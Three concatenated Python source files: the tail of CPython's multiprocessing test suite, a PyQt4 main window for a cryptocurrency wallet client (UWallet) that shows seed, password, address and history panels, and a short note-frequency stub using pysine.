will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit tests the base type is created in the parent
process, the @classmethod represents the worker process, and the
shared object is readable and writable by both.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
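    # Note on the properties below (descriptive comment): property(operator.attrgetter('manager.Queue'))
    # resolves the dotted path on attribute access, i.e. it returns self.manager.Queue, so each proxy
    # type is looked up lazily on the Manager created in setUpClass instead of being bound at class
    # definition time. Pool is a classmethod because it has to forward arguments.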
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
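# A minimal usage sketch (an assumption, not part of this file): a start-method-specific test module
# would import this module (here assumed importable as _test_multiprocessing) and install the tests
# into its own namespace:
#
#     import unittest
#     import _test_multiprocessing
#
#     _test_multiprocessing.install_tests_in_module_dict(globals(), 'spawn')
#
#     if __name__ == '__main__':
#         unittest.main()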
|
mainwindow.py
|
# -*- coding: utf-8 -*-
# @Time : 2017/12/8
# @Author : Shu
# @Email : httpservlet@yeah.net
# coding=utf-8
import os
import datetime
import sys
import math
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from FormUI.ui_mainwindow import Ui_bwalletMW
from Forms.create_wallet import CreateWalletDialog
from Forms.title import TitleWidget
from Forms.content import ContentWidget
from Forms.contextmenu import FileMenu, WalletMenu, ViewMenu, ToolsMenu, HelpMenu
from Forms.mengban_setting import SettingtWidget
from Forms.mengban_seed import SeedWidget
from Forms.mengban_password import PasswordWidget
from Forms.system_tray import MySystemTrayIcon
from uwallet.main import main
from Forms.thread_commands import CommandsWalker
class BwalletMainWindow(QMainWindow, Ui_bwalletMW):
def __init__(self, trans):
"""
        :param trans: language settings; a dict containing the custom translator and the Qt system-menu translator
"""
super(BwalletMainWindow, self).__init__()
self.setupUi(self)
self.setMinimumSize(QSize(800, 530))
        # attributes for dragging the frameless window
self.mouse_press_status = False
self.startPos = self.pos()
        # Maximizing a frameless window via the system call covers the taskbar,
        # so maximize/restore is re-implemented here.
        self.ismaxsize = False  # whether the window is currently maximized
self.geo = self.geometry()
        # trans passes in the two translators so the language set at startup can still be removed at runtime
self.qt_tr = trans.get('qt_tr')
self.translator = trans.get('translator')
        self.setWindowFlags(Qt.FramelessWindowHint)  # frameless window
        self.setAttribute(Qt.WA_TranslucentBackground, True)
        # self.setStyleSheet("background-color:#2C3E50;")
        # self.setWindowOpacity(0.5)  # opacity (0~1), 1 is fully opaque
        # layout
self.title_widget = TitleWidget(self)
self.content_widget = ContentWidget(self)
main_layout = QVBoxLayout()
main_layout.addWidget(self.title_widget)
main_layout.addWidget(self.content_widget)
main_layout.setSpacing(0)
main_layout.setContentsMargins(0, 0, 0, 0)
self.centralwidget.setLayout(main_layout)
button_list = [self.title_widget.tbt_history, self.title_widget.tbt_send, self.title_widget.tbt_receive,
self.title_widget.tbt_addresses]
signal_mapper = QSignalMapper(self)
for i, button in enumerate(button_list):
button.clicked.connect(signal_mapper.map)
signal_mapper.setMapping(button, i)
signal_mapper.mapped.connect(self.slot_turn_page)
        # Without a status bar there is no resize handle (QSizeGrip, normally provided by the status bar, is used for custom resizing)
self.size_grip = QSizeGrip(self)
self.size_grip.resize(20, 20)
        # set the opacity of the resize grip
opacityEffect = QGraphicsOpacityEffect()
self.size_grip.setGraphicsEffect(opacityEffect)
opacityEffect.setOpacity(0.7)
        # custom menu bar
self.button_list = [self.title_widget.btn_file, self.title_widget.btn_wallet, self.title_widget.btn_view,
self.title_widget.btn_tools, self.title_widget.btn_help]
signal_mapper = QSignalMapper(self)
for i, button in enumerate(self.button_list):
            # This is more complicated than necessary; QPushButton.setMenu() would do:
# http://blog.csdn.net/u011417605/article/details/51218493
button.clicked.connect(signal_mapper.map)
signal_mapper.setMapping(button, i)
signal_mapper.mapped.connect(self.slot_menu_bar)
self.title_widget.btn_close.clicked.connect(self.close)
self.title_widget.btn_min.clicked.connect(self.slot_minimize)
self.title_widget.btn_max.clicked.connect(self.slot_maximize)
self.title_widget.btn_setting.clicked.connect(self.slot_settings)
self.title_widget.btn_seed.clicked.connect(self.slot_getseed)
self.title_widget.btn_password.clicked.connect(self.slot_password)
self.init_systemtray()
self.command_walker = CommandsWalker(interval=3, filter_1='--receiving', parent=self)
self.connect(self.command_walker, SIGNAL('daemon'), self.slot_check_daemon, Qt.AutoConnection)
self.connect(self.command_walker, SIGNAL('address'), self.slot_address, Qt.AutoConnection)
self.connect(self.command_walker, SIGNAL('history'), self.slot_history, Qt.AutoConnection)
self.connect(self.command_walker, SIGNAL('balance'), self.slot_balance, Qt.AutoConnection)
self.title_widget.btn_file.setVisible(False)
self.title_widget.btn_wallet.setVisible(False)
self.title_widget.btn_view.setVisible(False)
self.title_widget.btn_tools.setVisible(False)
self.title_widget.btn_help.setVisible(False)
self.setWindowIcon(QIcon(":/images/ico"))
QTimer.singleShot(0, self.init_check)
#langindx = self.read_language_conf()
# lang = 'zh_CN'
# if langindx =='0':
# lang ='en_US'
# self.qt_tr = QTranslator()
# if self.qt_tr.load(':/qm/qt_{}.qm'.format(lang)):
# QApplication.installTranslator(self.qt_tr)
#
# self.translator = QTranslator()
# if self.translator.load(':/qm/{}'.format(lang)):
# QApplication.installTranslator(self.translator)
    ################################## initialization ##################################
def paintEvent(self,event):
m = 1
path = QPainterPath()
path.setFillRule(Qt.WindingFill)
path.addRect(m, m, self.width()-m*2, self.height()-m*2)
painter = QPainter(self)
#painter.drawLine(QLineF)
#painter.setRenderHint(QPainter.Antialiasing, True)
painter.fillPath(path, QBrush(Qt.white))
color = QColor(100, 100, 100, 30)
#for(int i=0; i<10; i++)
for i in range(m):
path = QPainterPath()
path.setFillRule(Qt.WindingFill)
path.addRoundRect(m-i, m-i, self.width()-(m-i)*2, self.height()-(m-i)*2,1,1)
color.setAlpha(90 - math.sqrt(i)*30)
painter.setPen(QPen(color,1,Qt.SolidLine))
painter.drawRoundRect(QRect(m-i, m-i, self.width()-(m-i)*2, self.height()-(m-i)*2), 0,0)
# path = QPainterPath()
# path.setFillRule(Qt.WindingFill)
# path.addRect(m-i, m-i, self.width()-(m-i)*2, self.height()-(m-i)*2)
# color.setAlpha(90 - math.sqrt(i)*30)
# painter.setPen(QPen(color,1))
# painter.drawPath(path
def init_check(self):
"""初始化主窗口时, 检查钱包是否存在"""
if not self.bwallet_main('haswallet', '--client'): # 如果没有钱包
self.hide()
create_dialog = CreateWalletDialog(self)
create_dialog.show()
else:
QTimer.singleShot(0, self.init_daemon)
def init_systemtray(self):
""" 初始化托盘图标 """
self.tray = MySystemTrayIcon(self)
self.tray.setIcon(QIcon(":/images/ico"))
self.tray.setToolTip(self.tr(u"UWallet client"))
self.tray.activated.connect(self.slot_systemtray)
self.tray.show()
def init_daemon(self):
"""启动daemon"""
# daemon不能在线程中启动, 不然各种奇怪的问题, 比如修改密码
self.bwallet_main('daemon', 'start', '--client')
# import multiprocessing
# sys.argv=sys.argv[:1]
# sys.argv.append('daemon')
# sys.argv.append('start')
# multiprocessing.Process(target=main).start()
self.command_walker.start()
    ################################## common helpers ##################################
def bwallet_main(self, *args, **kwargs):
""" 因为钱包的各种命令是线程不安全的, 所以为了安全的执行某条命令
在执行的时候, 最好是停止其他执行线程
kwargs: 会传入 thread_safe=True
表明需要先停止线程, 执行命令, 然后再启动线程
"""
thread_safe = kwargs.get('thread_safe')
sys.argv = sys.argv[:1]
for arg in args:
sys.argv.append(arg)
if thread_safe is True:
if self.command_walker.isRunning():
self.command_walker.stop()
self.command_walker.wait()
rs = main()
if thread_safe is True:
self.command_walker.start()
while True:
                # Guard against a stop/start pair happening too close together, which can block:
                # a second stop() may set stopped to True before the thread has run initialize();
                # initialize() then runs afterwards, isStopped() becomes False and the thread never exits,
                # so stopped stays False and wait() blocks forever.
if self.command_walker.isStopped() == False:
break
return rs
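    # Example (taken from the calls elsewhere in this class): commands issued while the
    # CommandsWalker thread is running should pass thread_safe=True, e.g.
    #     is_password = self.bwallet_main('haspassword', '--client', thread_safe=True)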
def is_title(self, xPos, yPos):
size = self.size()
x = size.width()
y = size.height()
return yPos < 30 and xPos < x - 120
def set_size(self):
"""mainwindow改变大小时, 修改其子控件大小"""
self.title_widget.setGeometry(0, 0, self.width(), 87)
self.content_widget.setGeometry(0, 87, self.width(), self.height() - 87)
self.set_grip_size()
self.set_mengban_size()
def set_grip_size(self):
"""设置缩放按钮到主程序的右下角(default:左上角)"""
self.size_grip.setGeometry(self.width() - 20, self.height() - 20, 20, 20)
def set_mengban_size(self, widget=None):
"""设置setting面板缩放操作, 以及缩放按钮置顶"""
if isinstance(widget, QWidget):
            widget.setGeometry(0, 35, self.width() - 2, self.height() - 35 - 2)  # the y offset of 35 keeps the maximize/minimize/close buttons clickable
else:
if hasattr(self, 'setting') and isinstance(self.setting, QWidget) and self.setting.isVisible():
self.setting.setGeometry(0, 35, self.width() - 2, self.height() - 35 - 2)
elif hasattr(self, 'getseed') and isinstance(self.getseed, QWidget) and self.getseed.isVisible():
self.getseed.setGeometry(0, 35, self.width() - 2, self.height() - 35 - 2)
elif hasattr(self, 'password') and isinstance(self.password, QWidget) and self.password.isVisible():
self.password.setGeometry(0, 35, self.width() - 2, self.height() - 35 - 2)
        self.size_grip.raise_()  # keep the bottom-right resize grip above all other widgets
def stop_daemon(self):
"""停止daemon服务"""
self.bwallet_main('daemon', 'stop', '--client')
def read_language_conf(self):
        langPath = os.path.join(os.path.abspath('.'), 'language.txt')
        if not os.path.exists(langPath):
            f = open(langPath, "w+")
            f.write('1')
            f.close()
        file_object = open(langPath, "r")
        lang = file_object.read()
        file_object.close()
        return lang
    def write_language_conf(self, lang):
        try:
            langPath = os.path.join(os.path.abspath('.'), 'language.txt')
            if not os.path.exists(langPath):
                f = open(langPath, "w+")
                f.write(lang)
                f.close()
            else:
                file_object = open(langPath, "w+")
                file_object.write(lang)
                file_object.close()
        except Exception as e:
            print(e)
    ################################## slot functions ##################################
def slot_change_lang(self, index):
"""设置语言槽函数"""
index = str(index)
lang = ''
if index == '0':
lang = 'en_US'
elif index == '1':
lang = 'zh_CN'
#self.write_language_conf(index)
        # remove the previously installed translators before installing the new language
if isinstance(self.qt_tr, QTranslator):
QApplication.removeTranslator(self.qt_tr)
if isinstance(self.translator, QTranslator):
QApplication.removeTranslator(self.translator)
self.qt_tr = QTranslator()
if self.qt_tr.load(':/qm/qt_{}.qm'.format(lang)):
QApplication.installTranslator(self.qt_tr)
self.translator = QTranslator()
if self.translator.load(':/qm/{}'.format(lang)):
QApplication.installTranslator(self.translator)
self.retranslateUi(self)
self.title_widget.retranslateUi(self.title_widget)
self.content_widget.retranslateUi(self.content_widget)
self.content_widget.custom_retranslateUi()
self.setting.retranslateUi(self.setting)
if hasattr(self, 'getseed'):
self.getseed.retranslateUi(self.getseed)
if hasattr(self, 'password'):
self.password.retranslateUi(self.password)
self.tray.retranslateUi()
def slot_minimize(self):
self.showMinimized()
def slot_maximize(self):
if self.ismaxsize:
self.setGeometry(self.geo)
self.ismaxsize = False
else:
self.geo = self.geometry()
self.setGeometry(QApplication.desktop().availableGeometry())
self.ismaxsize = True
def slot_turn_page(self, current_index):
self.content_widget.stackedWidget.setCurrentIndex(current_index + 1)
def slot_menu_bar(self, current_index):
        p = self.mapToGlobal(QPoint())  # global coordinates of the main window
        wd = self.button_list[current_index].geometry()  # position and size of the clicked menu button
file_menu = FileMenu(self)
wallet_menu = WalletMenu(self)
view_menu = ViewMenu(self)
tools_menu = ToolsMenu(self)
help_menu = HelpMenu(self)
menu_list = [file_menu, wallet_menu, view_menu, tools_menu, help_menu]
menu = menu_list[current_index]
menu.exec_(QPoint(p.x() + wd.x(), p.y() + 87))
def slot_settings(self):
if not (hasattr(self, 'setting') and isinstance(self.setting, QWidget)):
self.setting = SettingtWidget(self)
self.setting.btn_setting_appearance_close.clicked.connect(self.setting.close)
self.setting.cbx_setting_appearance_language.currentIndexChanged.connect(self.slot_change_lang)
if not self.setting.isVisible():
self.setting.show()
lang = unicode(QLocale.system().name())
# if lang == 'zh_CN':
# self.setting.cbx_setting_appearance_language.setCurrentIndex(1)
# else:
# self.setting.cbx_setting_appearance_language.setCurrentIndex(0)
self.setting.btn_setting_appearance_close.setFocus(True)
# self.setting.btn_setting_appearance_close.setShortcut(QKeySequence.InsertParagraphSeparator)
# self.setting.btn_setting_appearance_close.setShortcut(Qt.Key_Enter | Qt.Key_Return)
self.set_mengban_size(self.setting)
def slot_getseed(self):
if not (hasattr(self, 'getseed') and isinstance(self.getseed, QWidget)):
self.getseed = SeedWidget(self)
self.getseed.btn_seed_close.clicked.connect(self.getseed.close)
if not self.getseed.isVisible():
self.getseed.show()
self.getseed.led_seed_password.setText('')
is_password = self.bwallet_main('haspassword', '--client', thread_safe=True)
if is_password is True:
self.getseed.ted_setting_getseed.setVisible(False)
self.getseed.led_seed_password.setVisible(True)
self.getseed.btn_seed_password.setVisible(True)
else:
self.getseed.ted_setting_getseed.setVisible(True)
self.getseed.led_seed_password.setVisible(False)
self.getseed.btn_seed_password.setVisible(False)
try:
rs = self.bwallet_main('getseed', '--client', thread_safe=True)
except Exception as e:
print (e)
else:
self.getseed.ted_setting_getseed.setText(rs)
self.set_mengban_size()
def slot_password(self):
if not (hasattr(self, 'password') and isinstance(self.password, QWidget)):
self.password = PasswordWidget(self)
if not self.password.isVisible():
self.password.show()
self.password.led_password_current.setText('')
self.password.led_password_new.setText('')
self.password.led_password_comfirm.setText('')
is_password = self.bwallet_main('haspassword', '--client', thread_safe=True)
if is_password is True:
self.password.lbl_password_current.setVisible(True)
self.password.led_password_current.setVisible(True)
self.password.lbl_password_des.setText(self.tr(
"""Your bnc are password protected. \nHowever, your wallet file is not encrypted. \nUse this dialog to change your passowrd."""))
else:
self.password.lbl_password_current.setVisible(False)
self.password.led_password_current.setVisible(False)
self.password.lbl_password_des.setText(
self.tr("""Your wallet is not protected. \nUse this dialog to add a password to your wallet."""))
self.set_mengban_size()
def slot_systemtray(self, reason):
""" 系统托盘操作的槽函数 """
if reason == QSystemTrayIcon.DoubleClick:
if self.isVisible():
self.hide()
else:
self.show()
def slot_check_daemon(self, status):
"""检查daemon状态的槽函数"""
if status is True:
style = """border-image: url(:/images/greenball);"""
else:
style = """border-image: url(:/images/redball);"""
self.title_widget.btn_network.setStyleSheet(style)
def slot_address(self, listaddresses, cur_addr):
"""绑定address数据"""
# clear发射itemSelectionChanged信号
self.content_widget.twd_addresses.clear()
cur_item = None
for i, addr_balance in enumerate(listaddresses):
ab = addr_balance.split(',')
addr = ab[0].strip()
balance = ab[1].strip()
if balance.endswith('.'):
balance = balance[:-1]
view_list = [addr, balance]
item = QTreeWidgetItem(self.content_widget.twd_addresses, view_list)
item.setData(0, Qt.UserRole, QVariant(addr))
if self.content_widget.led_receiving_address.text().isEmpty():
self.content_widget.led_receiving_address.setText(addr)
if addr == cur_addr:
cur_item = item
if cur_item:
cur_item.setSelected(True)
update_dt = str(datetime.datetime.now()).split('.')[0]
self.content_widget.lbl_address_updatetime.setText(update_dt)
def slot_history(self, historys, cur_txid):
"""绑定history数据"""
self.content_widget.twd_history.clear()
cur_item = None
temps = []
for history in historys:
if not isinstance(history, dict):
                # the first batch returned is data from the listaddresses command, reason unknown
return
fee = history.get('fee')
value = history.get('value')
if value < 0:
amount = value + fee
else:
amount = value
dt = history.get('date').strip()
if dt == '----':
                dt = self.tr('unconfirmed')  # unconfirmed transaction
txid = history.get('txid').strip()
view_list = [dt, str(amount), str(fee)]
item = QTreeWidgetItem(self.content_widget.twd_history, view_list)
item.setData(0, Qt.UserRole, QVariant(txid))
if txid == cur_txid:
cur_item = item
if value >= 0:
item_column_count = range(item.columnCount())
for i in item_column_count:
item.setForeground(i, QBrush(QColor(0, 128, 0, 160)))
if cur_item:
cur_item.setSelected(True)
update_dt = str(datetime.datetime.now()).split('.')[0]
self.content_widget.lbl_history_updatetime.setText(update_dt)
def slot_balance(self, balance):
self.title_widget.lbl_balance.setText(balance)
    ################################## overridden system events ##################################
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.mouse_press_status = True
self.startPos = event.globalPos() - self.frameGeometry().topLeft()
def mouseReleaseEvent(self, event):
if event.button() == Qt.LeftButton:
self.mouse_press_status = False
def mouseMoveEvent(self, event):
if not self.ismaxsize:
if event.buttons() == Qt.LeftButton and self.mouse_press_status is True:
self.move(event.globalPos() - self.startPos)
def mouseDoubleClickEvent(self, event):
if event.button() == Qt.LeftButton:
point = self.mapFromGlobal(QCursor().pos())
if self.is_title(point.x(), point.y()):
self.slot_maximize()
def resizeEvent(self, event):
self.set_size()
# def showEvent(self, *args, **kwargs):
# self.slot_change_lang('0')
def closeEvent(self, event):
""" 重写关闭事件 """
# 关闭对应服务
self.tray.hide() # 隐藏托盘图标
# 不用手工关闭, 钱包模块已经实现了干净的关闭daemon线程的操作
self.stop_daemon() # 关闭daemon服务
if self.command_walker.isRunning():
self.command_walker.stop()
self.command_walker.wait()
        # self.close()
        # sys.exit(0)  # exiting this way feels faster, but possible side effects are unknown
# QTimer.singleShot(0, qApp, SLOT("quit()"))
def keyPressEvent(self, event):
""" 按下esc键, 实现与关闭按钮同样的效果 """
if event.key() == Qt.Key_Escape:
if hasattr(self, 'setting') and isinstance(self.setting, QWidget) and self.setting.isVisible():
self.setting.close()
elif hasattr(self, 'getseed') and isinstance(self.getseed, QWidget) and self.getseed.isVisible():
self.getseed.close()
elif hasattr(self, 'password') and isinstance(self.password, QWidget) and self.password.isVisible():
self.password.close()
else:
QMainWindow.keyPressEvent(self, event)
def eventFilter(self, obj, event):
if isinstance(obj, QFrame):
if unicode(obj.objectName()).encode('u8') in ['frame_left', 'frame_top']:
if event.type() == QEvent.MouseButtonPress:
obj.parent().close()
return True
return False
|
test.py
|
import random
import math
from pysine import sine
import multiprocessing
f0 = 440.0
a = math.pow(2, 1/12)
# fn = f0 * a^n
NOTES = [f0 * math.pow(a, x) for x in range(-30, 30, 1)]
MIN_NOTE_LENGTH = 100
MAX_NOTE_LENGTH = 1000
